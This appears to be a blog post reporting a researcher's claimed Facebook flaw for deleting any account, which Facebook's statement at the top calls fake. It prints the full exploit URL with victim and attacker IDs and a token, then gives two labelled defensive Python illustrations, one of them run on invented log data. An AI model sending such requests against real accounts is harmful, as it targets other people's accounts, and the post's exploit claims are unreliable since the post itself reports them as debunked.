
UPDATE: The vulnerability Ehraz Ahmed found was FAKE. Facebook says to Computerworld:

“This is not a real bug. We’ve audited our code to verify that there’s no variant of the proposed exploit that works against this endpoint or any other that we’ve found. Furthermore, we’ve verified in our logs that the ‘test account’ being used in the demonstration video was manually deactivated by visiting https://www.facebook.com/deactivate.php.”

A security researcher from India named Ehraz Ahmed claims that he found a vulnerability that anyone could use to delete any Facebook account; he sent us an email about his latest BUG.

Here is the complete process he says he used to delete a Facebook account:

Vulnerable link:

https://www.facebook.com/ajax/whitehat/delete_test_users.php?fb_dtsg=AQA1E-WE&selected_users[0]=[Victim's Profile ID]&__user=[Attacker's Profile ID]&__a=1

We can get the profile ID by using
http://graph.facebook.com/[username]

Here [username] indicates the username of your Facebook profile!

In this demo we will be using a test profile
Name: Rahul Agnikotri
https://www.facebook.com/hexgroup (victim's profile) (this is my test profile)

We can remove any account on Facebook, even that of Mark Zuckerberg or any celebrity.

  • Attacker's profile ID = 1781913563

  • Victim's profile ID = 100001831297334

https://www.facebook.com/ajax/whitehat/delete_test_users.php?fb_dtsg=AQA1E-WE&selected_users[0]=100001831297334&__user=1781913563&__a=1
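Whether a request like the one above can touch an account it names comes down to server-side authorization, which is what Facebook's statement asserts holds for this endpoint. The following Python is an added illustration, not Facebook's code and not part of the researcher's report: it models the checks a "delete test users" handler needs so that an arbitrary `selected_users[]` value is a no-op unless the caller administers that test account. The session, directory, `Forbidden` error and sample data are constructed for the example; the parameter names and the two profile IDs come from the request on the page.

```python
"""Hypothetical authorization logic for a 'delete test users' endpoint.

Added example, not Facebook's code. Nothing in the request is trusted on
its own: the CSRF token is checked against the session, the acting user
is taken from the session rather than from __user, and each selected id
must be a test user owned by an app the caller administers.
"""
from dataclasses import dataclass, field
import hmac


@dataclass
class Session:
    user_id: str
    csrf_token: str          # value the page must echo back as fb_dtsg


@dataclass
class Account:
    user_id: str
    is_test_user: bool = False
    owner_app_id: str = ""   # app that created this test user, if any
    deleted: bool = False


@dataclass
class Directory:
    accounts: dict = field(default_factory=dict)    # user_id -> Account
    app_admins: dict = field(default_factory=dict)  # app_id -> set of admin ids


class Forbidden(Exception):
    """Raised when a check fails that should abort the whole request."""


def delete_test_users(session, params, directory):
    """Return the list of user ids actually deleted.

    params mirrors the query string on the page: fb_dtsg, __user and
    selected_users (a list). Ids that are not test users, or that the
    caller does not administer, are skipped rather than deleted.
    """
    # 1. CSRF token must match the session (constant-time compare).
    if not hmac.compare_digest(params.get("fb_dtsg", ""), session.csrf_token):
        raise Forbidden("bad fb_dtsg")
    # 2. __user is informational only; the acting user is the session user.
    if params.get("__user") != session.user_id:
        raise Forbidden("__user does not match session")
    deleted = []
    for uid in params.get("selected_users", []):
        acct = directory.accounts.get(uid)
        # 3. Skip anything that is not a test user ...
        if acct is None or not acct.is_test_user:
            continue
        # 4. ... or a test user the caller does not administer.
        admins = directory.app_admins.get(acct.owner_app_id, set())
        if session.user_id not in admins:
            continue
        acct.deleted = True
        deleted.append(uid)
    return deleted


def demo():
    """Constructed scenario: the request from the page, sent by a session
    that administers one test user but names a real account as well.

    Returns (ids deleted, whether the real account was touched)."""
    d = Directory()
    d.accounts["100001831297334"] = Account("100001831297334")  # real account
    d.accounts["900000000000001"] = Account("900000000000001", True, "app-1")
    d.app_admins["app-1"] = {"1781913563"}
    s = Session("1781913563", "AQA1E-WE")
    req = {"fb_dtsg": "AQA1E-WE", "__user": "1781913563",
           "selected_users": ["100001831297334", "900000000000001"]}
    return delete_test_users(s, req, d), d.accounts["100001831297334"].deleted


if __name__ == "__main__":
    print(demo())  # (['900000000000001'], False)
```

The point of the model is step 3 and 4: the handler decides what it may delete from its own records of who owns which test user, so the id supplied in `selected_users[]` cannot widen the caller's authority.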

He also uploaded a video demonstration of this vulnerability:

Remote Facebook Account Exploit from Ehraz Ahmed on Vimeo.

He also reported it to Facebook, and the account seems to have been recovered at this time. After he reported this harmful BUG to Facebook, they replied to him that “The bug only works for test accounts”, but we also checked the cached version of the account he deleted and found that it was not a test one; Ahmed (the security researcher) also told us the account he deleted was 2 years old.

Last month a researcher from Palestine hacked Mark Zuckerberg’s timeline to report a BUG, and he was also one of those who was not awarded by Facebook, because he violated the terms by hacking Zuckerberg’s timeline.
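Facebook's update at the top of this post says its logs showed the demo account was deactivated by visiting deactivate.php, not through the whitehat endpoint. The following Python is an added example of that kind of triage, not Facebook's tooling: it parses a constructed access-log extract (the line format, timestamps and the extra id 900000000000001 are invented for the example; the two page ids and endpoint paths are from the post) and reports, for a given account id, what the logs actually show about how it was deactivated.

```python
"""Reconciling a bug-report demo against server-side request logs.

Added example. A 200 from delete_test_users.php only proves the request
was made, not that anything was deleted, so the verdict gives priority
to a self-service deactivation by the account itself.
"""
import re

# Constructed access-log extract, one request per line.
LOG = """\
2013-09-15T10:02:11Z user=1781913563 GET /ajax/whitehat/delete_test_users.php selected_users[0]=100001831297334 status=200
2013-09-15T10:02:15Z user=1781913563 GET /ajax/whitehat/delete_test_users.php selected_users[0]=900000000000001 status=200
2013-09-15T10:05:40Z user=100001831297334 POST /deactivate.php status=302
2013-09-15T10:06:02Z user=100001831297334 GET /home.php status=403
this line is malformed and is skipped
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) user=(?P<user>\d+) (?P<method>GET|POST) (?P<path>\S+)"
    r"(?: (?P<qs>\S+=\S+))? status=(?P<status>\d+)$"
)


def parse_log(text):
    """Yield a dict per well-formed line; malformed lines are skipped."""
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            yield m.groupdict()


def names_account(qs, account_id):
    """True if a selected_users[...] parameter carries exactly account_id."""
    if not qs:
        return False
    key, _, value = qs.partition("=")
    return key.startswith("selected_users") and value == account_id


def explain_deactivation(log_text, account_id):
    """Summarise what the logs show for account_id.

    verdict is 'self-service' if the account itself hit deactivate.php
    successfully, 'whitehat-endpoint' if only delete_test_users requests
    naming it are present, otherwise 'no evidence'.
    """
    self_service_at = None
    endpoint_requests = []
    for rec in parse_log(log_text):
        if (rec["path"] == "/deactivate.php" and rec["user"] == account_id
                and rec["status"] in ("200", "302")):
            self_service_at = rec["ts"]
        if (rec["path"].endswith("/delete_test_users.php")
                and names_account(rec["qs"], account_id)):
            endpoint_requests.append({"ts": rec["ts"], "by": rec["user"]})
    if self_service_at:
        verdict = "self-service"
    elif endpoint_requests:
        verdict = "whitehat-endpoint"
    else:
        verdict = "no evidence"
    return {"account": account_id, "verdict": verdict,
            "self_service_at": self_service_at,
            "endpoint_requests": endpoint_requests}


if __name__ == "__main__":
    for acct in ("100001831297334", "900000000000001", "555"):
        print(explain_deactivation(LOG, acct))
```

Run against the constructed extract, the page's "victim" id comes back as self-service (the account deactivated itself a few minutes after the endpoint request), while the invented test id comes back as whitehat-endpoint; that is the distinction a platform has to draw before treating a demo video as proof.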
